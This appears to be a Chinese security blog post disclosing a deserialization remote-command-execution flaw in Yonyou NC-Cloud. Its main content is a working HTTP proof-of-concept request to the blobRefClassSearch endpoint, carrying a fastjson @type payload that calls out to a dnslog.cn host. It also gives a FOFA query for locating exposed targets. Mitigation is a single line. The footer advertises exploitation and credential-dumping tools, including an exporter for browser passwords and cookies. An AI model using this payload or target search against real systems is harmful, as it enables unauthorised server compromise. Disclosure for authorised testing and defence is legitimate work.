【护网漏洞】用友NC-Cloud 远程命令执行

文摘   2024-08-02 07:00   四川  

影响范围

用友NC-Cloud

漏洞概述

用友NC-Cloud是用友网络科技公司推出的一款面向中小企业的云服务产品,该产品整合了用友各类管理软件如ERP、CRM、OA等,实现了这些软件的云化部署,用友NC-Cloud存在反序列化漏洞。攻击者可以利用此漏洞执行任意命令,通过该漏洞可以获取服务器权限

漏洞复现

应用界面如下所示:

漏洞POC如下所示:

POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36Content-Type: application/jsonContent-Length: 111
{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"0g4idv.dnslog.cn\"}}}"}

DNSlog回显如下:

目标检索

FOFA:

app="用友-NC-Cloud"

安全建议

升级到最新版本~

免责声明

本篇文章提及的漏洞POC仅限于安全人员在授权的情况下对业务系统进行测评验证,由于传播、利用本篇文章中提及的漏洞POC进行未授权的非法攻击测试造成的法律责任均由使用者本人负责,本人不为此承担任何责任

·推 荐 阅 读·

最新后渗透免杀工具

【护网必备】高危漏洞综合利用工具

   【护网必备】Shiro反序列化漏洞综合利用工具增强版

【护网必备】外网打点必备-WeblogicTool

护网必备】最新Struts2全版本漏洞检测工具

Nacos漏洞综合利用工具

重点OA系统漏洞利用综合工具箱  

【护网必备】海康威视RCE批量检测利用工具

【护网必备】浏览器用户密码|Cookie|书签|下载记录导出工具


横向移动之RDP&Desktop Session Hija


七芒星实验室
未知攻,焉知防,以攻促防,共筑安全!
 最新文章